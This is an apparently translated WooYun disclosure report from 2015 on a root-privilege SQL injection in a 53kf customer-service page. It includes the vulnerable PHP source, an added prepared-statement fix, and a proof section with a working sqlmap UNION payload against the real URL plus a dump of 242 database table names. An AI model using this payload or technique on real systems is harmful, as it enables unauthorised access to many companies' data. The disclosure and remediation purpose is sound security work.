
Vulnerability summary

Defect ID: WooYun-2015-92782

Title: Root-privilege SQL injection in one 53kf page

Vendor: 53KF Enterprise Online Platform (53KF企业在线平台)

Author: feng (certified white hat)

Submitted: 2015-01-20 00:42

Published: 2015-03-06 00:44

Vulnerability type: SQL injection

Severity: High

Self-rated Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact help@wooyun.org

Tags: php + numeric-type injection, MySQL



Vulnerability details

Disclosure status:

2015-01-20: Details sent to the vendor, awaiting vendor action
2015-01-20: Vendor confirmed; details disclosed to the vendor only
2015-01-30: Details disclosed to core white hats and domain experts
2015-02-09: Details disclosed to regular white hats
2015-02-19: Details disclosed to intern white hats
2015-03-06: Details disclosed to the public

Brief description:

Root-privilege SQL injection in one 53kf page.

Detailed description:

The vulnerable URL is http://www5.53kf.com/iframe_brief.php?style_id=106000198&language=cn

The affected parameter is style_id. It is a numeric injection (the value is concatenated into the query unquoted, so no quote character is needed) and UNION queries work.



[Screenshot: 531.jpg]





load_file() works as well; below is the source of the PHP file that contains the injection:

<?php
define("IN_OK", true);
require_once('include/global.php');

$style_id = get_value("style_id");
$language = get_value("language");

$notes = "";

// style_id is concatenated into the query unquoted: this is the injection point
$sql = "select config_value from company_config where style_id=".$style_id." and config_id='company_notes' and company_id!=0";
$notes = db_query11($sql);

if($notes!="")
{
    $notes = matchQQ($notes);
}

$tpl->assign("notes", $notes);
$tpl->display("iframe_brief.htm");

// read a value from $_GET[]
function get_value($get_name, $re="")
{
    if(isset($_GET[$get_name]) && trim($_GET[$get_name])!="")
    {
        $re = filterSQL($_GET[$get_name]);
    }
    return $re;
}

// turn "QQ123456" in the text into a clickable QQ icon
function matchQQ($str)
{
    global $language, $master_host;

    $title = "";
    if($language=="cn")
    {
        $title = "点击跟我QQ聊";
    }
    else if($language=="tw")
    {
        $title = "點擊跟我QQ聊";
    }
    else if($language=="en")
    {
        $title = "Click to chat with me";
    }
    else
    {
        $title = "Click to chat with me";
    }
    $str = preg_replace("/qq([0-9]+)/i","<img border=\"0\" title=\"".$title."\" src=\"http://".$master_host."/img/qq.gif\" onclick=\"addQQ('$1')\" style=\"cursor:pointer\"/>",$str);
    return $str;  // the rest of the file is truncated in the report
}
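The fix the report leaves to the vendor is a bound parameter plus strict input validation. What follows is an added example written for this page, not 53kf's code: it rewrites the company_config lookup from iframe_brief.php so that style_id is validated as a plain integer and then bound through a PDO prepared statement instead of being concatenated into the SQL string. The functions parse_style_id, fetch_company_notes and make_fixture are this example's own names, and the in-memory SQLite table with constructed rows stands in for the production MySQL database (the PDO calls are the same for MySQL).

```php
<?php
// Added example (not the vendor's code): hardened version of the
// company_config lookup from the report. Assumes the pdo_sqlite extension.
declare(strict_types=1);

// Strictly validate style_id before it goes anywhere near SQL.
// Returns null for anything that is not a plain non-negative integer,
// so a value such as "-5466 UNION ALL SELECT ..." is rejected up front.
function parse_style_id(?string $raw): ?int
{
    if ($raw === null) {
        return null;
    }
    $raw = trim($raw);
    // digits only: no sign, no spaces, no comment markers; length cap avoids overflow
    if (!preg_match('/^[0-9]{1,18}$/', $raw)) {
        return null;
    }
    return (int) $raw;
}

// Same query as the report, but with a bound parameter. The database
// driver sends the value separately from the SQL text, so the query
// structure cannot be altered by the input. Returns "" when no row matches.
function fetch_company_notes(PDO $db, int $style_id): string
{
    $stmt = $db->prepare(
        'SELECT config_value FROM company_config'
        . ' WHERE style_id = :style_id'
        . " AND config_id = 'company_notes' AND company_id != 0"
    );
    $stmt->execute([':style_id' => $style_id]);
    $value = $stmt->fetchColumn();
    return $value === false ? '' : (string) $value;
}

// Constructed fixture: an in-memory table shaped like company_config.
function make_fixture(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE company_config ('
        . 'company_id INTEGER, style_id INTEGER, config_id TEXT, config_value TEXT)');
    $ins = $db->prepare('INSERT INTO company_config VALUES (?, ?, ?, ?)');
    $ins->execute([1, 106000198, 'company_notes', 'Welcome, contact QQ123456']);
    $ins->execute([0, 106000198, 'company_notes', 'template row with company_id 0']);
    $ins->execute([2, 106000199, 'company_notes', 'another tenant']);
    return $db;
}

// Usage: a legitimate style_id and the sqlmap-style payload from the
// proof section, as they would arrive in $_GET['style_id'].
$db = make_fixture();
$inputs = [
    '106000198',
    '-5466 UNION ALL SELECT CONCAT(0x716c756e71,0x71746f6a71)#',
];
foreach ($inputs as $raw) {
    $id = parse_style_id($raw);
    if ($id === null) {
        echo "rejected before any query: " . $raw . "\n";
        continue;
    }
    echo "style_id " . $id . " -> " . fetch_company_notes($db, $id) . "\n";
}
```

Run it with the PHP CLI on a build that includes pdo_sqlite. The integer check alone would stop the payload shown in the proof section, but the prepared statement is what removes the bug class, since it no longer matters what filterSQL() lets through. The "root" part of the finding is a separate, independent problem: a web application's database account should not hold the FILE privilege or rights on other schemas, so that load_file() and cross-database reads are unavailable even if another injection appears elsewhere.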



Proof of vulnerability:

A large amount of data is exposed, covering 20,000+ companies. Look at how many tables there are:



Place: GET
Parameter: style_id
Type: UNION query
Title: MySQL UNION query (NULL) - 1 column (custom)
Payload: style_id=-5466 UNION ALL SELECT CONCAT(0x716c756e71,0x6b78525841414517753,0x71746f6a71)#&language=cn
---
[22:50:18] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
[22:50:18] [INFO] fetching tables for database: 'talk'
[22:50:18] [INFO] the SQL query used returns 242 entries
[22:50:18] [INFO] starting 10 threads
Database: talk
[242 tables]

+--------------------------------+

| C3P0TestTable |

| identity |

| module |

| access |

| access_log |

| account_switch |

| agent_oper |

| agent_style_lock |

| area_kf |

| autoreply |

| block_user |

| chat_count |

| chat_count_201310111524 |

| chat_count_result |

| chat_nation |

| chat_search |

| chat_tables |

| chat_worker |

| company |

| company_ad |

| company_config |

| company_etel |

| company_style |

| company_tinet |

| company_tinet_cno |

| conf_ip1 |

| conf_ip1_old |

| conf_sync |

| config_id_remark |

| config_value_remark |

| counter |

| cus_bill |

| cus_group |

| cus_link |

| cus_mail |

| cus_sms |

| cus_theme |

| cus_user |

| cus_web_msg |

| customer |

| cyy |

| cyy_group |

| daemonlog_recv |

| daemonlog_send |

| disconnect_statistics |

| download_job |

| email |

| err_infos |

| err_infos_kf |

| etel_logo |

| face |

| file |

| identity_role_id |

| ill_words |

| image |

| imessage |

| inner_identity |

| kf_group |

| kf_group_newthing |

| kf_group_upload |

| kf_share |

| link |

| login_off |

| logo |

| logsql |

| mail_template |

| mailqueue |

| message |

| message_buffer |

| message_d1 |

| message_d10 |

| message_d11 |

| message_d12 |

| message_d13 |

| message_d14 |

| message_d15 |

| message_d16 |

| message_d17 |

| message_d18 |

| message_d19 |

| message_d2 |

| message_d20 |

| message_d21 |

| message_d22 |

| message_d23 |

| message_d24 |

| message_d25 |

| message_d26 |

| message_d27 |

| message_d28 |

| message_d29 |

| message_d3 |

| message_d30 |

| message_d31 |

| message_d32 |

| message_d33 |

| message_d34 |

| message_d35 |

| message_d36 |

| message_d37 |

| message_d38 |

| message_d39 |

| message_d4 |

| message_d40 |

| message_d41 |

| message_d42 |

| message_d43 |

| message_d44 |

| message_d45 |

| message_d46 |

| message_d47 |

| message_d48 |

| message_d49 |

| message_d5 |

| message_d50 |

| message_d51 |

| message_d52 |

| message_d53 |

| message_d6 |

| message_d7 |

| message_d8 |

| message_d9 |

| module_new |

| module_special |

| module_style_num_bak |

| msg_reply |

| operate_log |

| quality_tj |

| robot |

| robot_hot |

| robot_mem |

| room_message |

| sms_config |

| sms_lword |

| sph_counter |

| sql_sync |

| stat_keyword_month |

| stat_place |

| stat_search |

| stat_to |

| statistic |

| statistic_from |

| statistic_mobile |

| statistic_nation |

| statistic_net |

| statistic_place |

| sync_cus_user |

| sync_worker_stat |

| sys_notify |

| talk_evalu |

| talk_his |

| talk_his_buffer |

| talk_his_d1 |

| talk_his_d10 |

| talk_his_d11 |

| talk_his_d12 |

| talk_his_d13 |

| talk_his_d14 |

| talk_his_d15 |

| talk_his_d16 |

| talk_his_d17 |

| talk_his_d18 |

| talk_his_d19 |

| talk_his_d2 |

| talk_his_d20 |

| talk_his_d21 |

| talk_his_d22 |

| talk_his_d23 |

| talk_his_d24 |

| talk_his_d25 |

| talk_his_d26 |

| talk_his_d27 |

| talk_his_d28 |

| talk_his_d29 |

| talk_his_d3 |

| talk_his_d30 |

| talk_his_d31 |

| talk_his_d32 |

| talk_his_d33 |

| talk_his_d34 |

| talk_his_d35 |

| talk_his_d36 |

| talk_his_d37 |

| talk_his_d38 |

| talk_his_d39 |

| talk_his_d4 |

| talk_his_d40 |

| talk_his_d41 |

| talk_his_d42 |

| talk_his_d43 |

| talk_his_d44 |

| talk_his_d45 |

| talk_his_d46 |

| talk_his_d47 |

| talk_his_d48 |

| talk_his_d49 |

| talk_his_d5 |

| talk_his_d50 |

| talk_his_d51 |

| talk_his_d52 |

| talk_his_d53 |

| talk_his_d6 |

| talk_his_d7 |

| talk_his_d8 |

| talk_his_d9 |

| talk_his_delete |

| talk_his_temp |

| talk_id |

| talk_quality |

| talk_subject |

| talk_theme |

| talk_vote |

| talk_weixin |

| temp_download_2talk_his |

| temp_download_chat_nation |

| temp_download_chat_worker |

| temp_download_cus_user |

| temp_download_imessage |

| temp_download_message |

| temp_download_stat_place |

| temp_download_statistic |

| temp_download_statistic_from |

| temp_download_statistic_nation |

| temp_download_statistic_net |

| temp_download_statistic_place |

| temp_download_talk_his |

| temp_download_worker |

| v5_company_config |

| visitor_lnk |

| visitor_trace |

| visitor_trace_old0730 |

| wechat_guest |

| weixin_config |

| worker |

| worker_config |

| worker_group |

| worker_online_log |

| worker_online_log_detail |

| zsk_category |

| zsk_key |

| zsk_noanswer |

| zsk_question |

+--------------------------------+

Fix recommendation:

You are the experts; look forward to the next episode.

Copyright notice: reprints must credit the source, feng@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-01-20 09:17

Vendor reply:

Thanks for reporting this issue; it has been fixed as an emergency. Thank you.

Latest status:

None

